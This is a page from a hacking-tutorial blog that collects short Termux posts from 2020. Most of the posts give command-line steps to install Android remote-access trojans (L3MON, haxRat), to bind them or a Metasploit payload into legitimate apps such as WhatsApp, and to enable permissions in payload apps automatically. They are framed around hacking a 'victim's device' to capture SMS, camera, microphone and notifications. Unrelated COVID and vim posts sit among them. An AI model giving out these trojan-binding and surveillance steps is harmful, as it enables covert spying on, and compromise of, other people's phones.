Sunday 13 December 2020

Bind RAT/L3MON/LEMON With Any Android App

4 comments

 Hey guys so today i am sharing a easy way to bind L3MON/LEMON in any Android App just from your termux :) 

Requirements : 

Steps :

  • First update and upgrade your termux 
  • apt update && apt upgrade
    

  • Now install apkmod2 by a simple apt command
  • apt install apkmod2

  • Now just bind your lemon by a simple command
  • apkmod2 -i /path/to/original.apk
So congratulations you have binded lemon and you can copy or move binded app from location ~/lemon/L3MON_binded.apk

Some Useful Videos Regarding lemon

Install Lemon In Termux

Setup Lemon on WAN

Bind lemon with app

Read More

Thursday 10 September 2020

Install LEMON / L3MON In Termux No VPS No Root

11 comments


 Hey guys so today i am sharing a easy way to install L3MON/LEMON in your termux :) 

Requirements : 

Steps :

  • First update and upgrade your termux 
  • apt update && apt upgrade
    

  • Now install lemon by a simple apt command
  • apt install lemon
So congratulations you have lemon and now you can make lemon juice LOL

Some Useful Videos Regarding lemon

Install Lemon In Termux

Setup Lemon on WAN

Bind lemon with app

Read More

Saturday 5 September 2020

Learn Bash From Scratch In Hindi In Termux

11 comments


Hey guys so if you are reading this post trust me you are going to change yourself into a cold blooded programmer.

You need only one thing i.e TERMUX. Here you can learn bash programming language without computer or laptop. Just an android phone.

Yes, i am sharing my whole playlist of bash series which is in hindi language. I recieved lots of positive feedbacks for this series and i am damn sure you will enjoy it :)

And don't forget to subscribe my channel because i will add more videos on bash until world ends.

So here is Link of Playlist 

Click here

Read More

Monday 29 June 2020

Install HaxRat In Termux Or Kali Linux

26 comments


Hey guys so again welcome to my website and today I would like to introduce my new project haxRat ( A Android RAT ) with cool features.

Key features

  • GPS Logging
  • ScreenShot capture
  • Screen recording
  • Rear Camera Recorder
  • Front camera recorder
  • Device Lock
  • Microphone Recording
  • SMS capture
  • SMS send
  • Notification Access ( Including whatsapp instagram or more )
  • View Contacts
  • Call Logs
  • Live Clipboard capture
  • File explorer and downloader
  • List of installed apps on device

TODO

  • Call Blocker
  • Contact adder
  • Call recording
  • Keylogger
  • You can request your own ;)
Well so let's come to the installation process 

Installation

There are two ways to install it 
  1. Using TermuxBlacK ( Click Me To Install )
  2. Manually from GitHub

Using TermuxBlacK 

If you are Termux Black user then you can install haxRat by simple apt command 

apt update && apt install haxrat

Manually From GitHub

Ok so now if you don't want to install Termuxblack or you don't have TermuX and want to install it in Kali Linux or Ubuntu so this section is for you :)
  • First clone the repository 
git clone https://github.com/hax4us/haxRat.git
  • Install Java 8
sudo apt install openjdk-8-jre 
  • Install NodeJs CLICK HERE
  • Now goto server directory of haxRat 
cd haxRat/server
  • Install all node dependencies
npm install
  • Now you can run haxRat server
node index.js
  • Navigate in browser to
localhost:22533

Ok so now you will see a login panel just like below


Default Username : admin
Default password : CLICK ME TO GET PASSWORD

OK so after login you will see a user interface just like this


 you will not see any online devices in list but don't worry. You will have to first create haxRat client app to install in victim's device.

I am not going to write about how to make app and how to install HaxRat in victim's device because i already made videos about all those topics which are required and necessary to install & setup haxRat server & haxRat client to hack any android device :)

Here is list of all must watch videos 

Setup haxRat for first time CLICK ME
Setup L3MON with PORTMAP to hack devices on WAN ( wide area network ) CLICK ME ( you can follow same video for haxRat also )

Read More

Sunday 21 June 2020

Bind Metasploit Payload With App In Termux

12 comments


So let's bind Metasploit Payload in any android application in termux. You can also bind Metasploit Payload with GBWhatsapp using apkmod.

REQUIREMENTS 

  • Termux 
  • Apkmod Installed in Termux
  • That's it :)

INSTALL APKMOD IN TERMUX

Goto this page CLICK HERE

Ok so now let's bind an app with metasploit payload 

STEPS 

  • First make sure that you have Installed metasploit already and have your original app in which you want to bind :)
  • Execute apkmod with -b option to give your original legit app and -o option to give new name for binded app and lhost & lport to make payload with lhost and lport at same time. 
  • General Syntax of using apkmod is 
apkmod -b -i original.apk -o binded.apk lhost=yourLhostHere lport=yourLportHere

EXAMPLE

Ok so i will give you a demo by binding payload in whatsapp

apkmod -b -i /sdcard/Whatsapp.apk -o mybindedapp.apk lhost=127.0.0.1 lport=4444

After above command , apkmod will make the payload with given lhost & lport then bind with gbwhatsapp. 

Happy Payloading .. :)

You can always contact me at telegram 


Read More

Wednesday 10 June 2020

Enable Android Permissions Automatically in Android payload

4 comments

Enable Android Permissions


Hey geeks i hope you are doing great and today I am here with a new trick to enable all Android permissions in any App ( whether it's binded with payload or not ) 

So let's see then :)

So first we will fulfill our requirements :

  • Apkmod must be installed in termux
  • That's it :)

How to install Apkmod ? 

  • First download installer script 
wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh

  • Now execute or run it
sh setup.sh


Ok so now everything is setup :)

Enable Android Permissions 

apkmod --enable-perm=/path/to/app.apk -o output.apk


In Case if you want to watch a practical video 


Read More

Monday 1 June 2020

How to install trape in termux

2 comments
Hax4Us

Hey guys so i am here again with a awesome post where we will see that how can we install trape in termux.

Trust me it's going to be a easy task :)

Ok so let me tell the requirements first
  • A good internet connection
  • And wait ? What ? Yes that's it
Lets do this then 
  • First install TermuX BlacK ( A TermuX repository for hackers ) 
Ok so how to install TermuX BlacK then ? Well let's see
Just execute following commands one by one 
       wget https://github.com/Hax4us/TermuxBlack/raw/master/install.sh

       sh install.sh

Ok so now TermuX BlacK is installed and now you can easily install trape by just one
Command
       apt install trape

Now to launch trape 
      trape
Now you will see interface like this


That's it :) now configure your trape as usual & in case of anytype of query you can always join our community in telegram CLICK HERE

In case if you don't know how to setup/configure trape at first time so you can watch below video



Read More

Wednesday 20 May 2020

How to install metasploit in termux android lolipop or marshmallow

2 comments
Hax4Us

So after many issues faced by users of android below nougat , i decided to add android 5 and 6 support in my script.

Steps :

  • download the script in $HOME directory wget https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
  • Run chmod +x metasploit.sh && ./metasploit.sh
Now you can use or run metasploit by command 
msfconsole
Well in case of any error you can always comment here or open an issue on my GitHub repository Metasploit_termux
Read More

Tuesday 31 March 2020

How To Install Masscan In Termux (Android)

3 comments

Hax4Us.com
Hey geeks so i am here again after a long time, with a cool stuff. As you can see in topic section , we are going to install Masscan ( A powerful tool for CTF ) which was requested by Shiv Twitter Uname @1ndianl33t

So without any delay , let's see requirements and steps.

Note :- All commands are written in bold style & in red color.

Requirements :-





  1. Termux ( offcourse )
  2. Build essential packages ( see step 1 )
  3. Good internet connection
  4. And at last patience.

Steps :-


  1. Install build essential packages apt install build-essential
  2. Download the Masscan package wget https://Hax4us.github.io/files/masscan.tar.gz & Extract it tar xf masscan.tar.gz
  3. Goto masscan directory cd masscan 
  4. Now it's time to build it make
  5. Move it to bin so that you can access it easily mv bin/masscan $PREFIX/bin 
  6. Give execution permissions chmod +x $PREFIX/bin/masscan
  7. That's it :) Now you can use it.

Read More

Thursday 26 March 2020

Coronavirus: All you need to know about symptoms and risks

1 comment
Hax4Us
Hey geeks, today's post is not about any geeky thing but a informative article about corona virus to spread awareness.
Its just my small effort to aware people.

What are symptoms ?






According to the WHO, signs of infection include fever, cough, shortness of breath and breathing difficulties.
In more severe cases, it can lead to pneumonia, multiple organ failure and even death.
Current estimates of the incubation period - the time between infection and the onset of symptoms - range from one to 14 days. Most infected people show symptoms within five to six days.
However, infected patients can also be asymptomatic, meaning they do not display any symptoms despite having the virus in their systems.

When will be vaccine available ? 

Scientists around the globe are racing to develop a vaccine but have warned it is not likely one will be available for mass distribution before 2021.
Meanwhile, Chinese authorities have effectively sealed off Wuhan and placed restrictions on travel to and from several other cities, affecting some 60 million people. Other countries have since followed suit with total lockdowns, closing schools, restaurants, bars, and sports clubs, and also issuing mandatory work-from-home decrees.  
International airlines have cancelled flights the world over. Some countries have banned non-citizens from entering their territories, and several more have evacuated their citizens from abroad.

Smokers must stay away from smoking

Smoking can make people more susceptible to serious complications from a coronavirus infection, the European Union agency for disease control said.
In its updated assessment of the risks caused by the coronavirus, the European Centre for Disease Control and Prevention (ECDC) included smokers among those potentially most vulnerable to COVID-19.
Smokers have also appeared to be more susceptible to breathing complications caused by the disease, and the ECDC said it was advisable to identify them as a potential vulnerable group, confirming an earlier assessment.
The agency cited a study by Chinese doctors which on a sample of 99 patients affected by the coronavirus found that acute smokers were more at risk of dying than elderly people.
The ECDC report also said smoking was associated with heightened activity in the lungs of an enzyme, ACE2, that could make patients more vulnerable to COVID-19, citing a study conducted by Guoshuai Cai, from the University of South Carolina.
Read More

Thursday 2 January 2020

How To Enable Line Numbering In Vim In Termux

13 comments
Hax4Us.com
So line numbering is one of the cool feature of vim and it feels like a IDE. But it doesn't come by default and unfortunately many beginners are not aware from this feature.

Let's Enable it Then :)

Steps :-




  1. First we have to create a file named .vimrc in home directory of termux. vi ~/.vimrc ( if you have this file already , just skip this step )
  2. Now just write a simple line :set number
  3. Save & exit from vim by just pressing ESC and then two times Z ( in upper case )
  4. Done :) 
Checkout this tutorial to use your VIM like a pro

Read More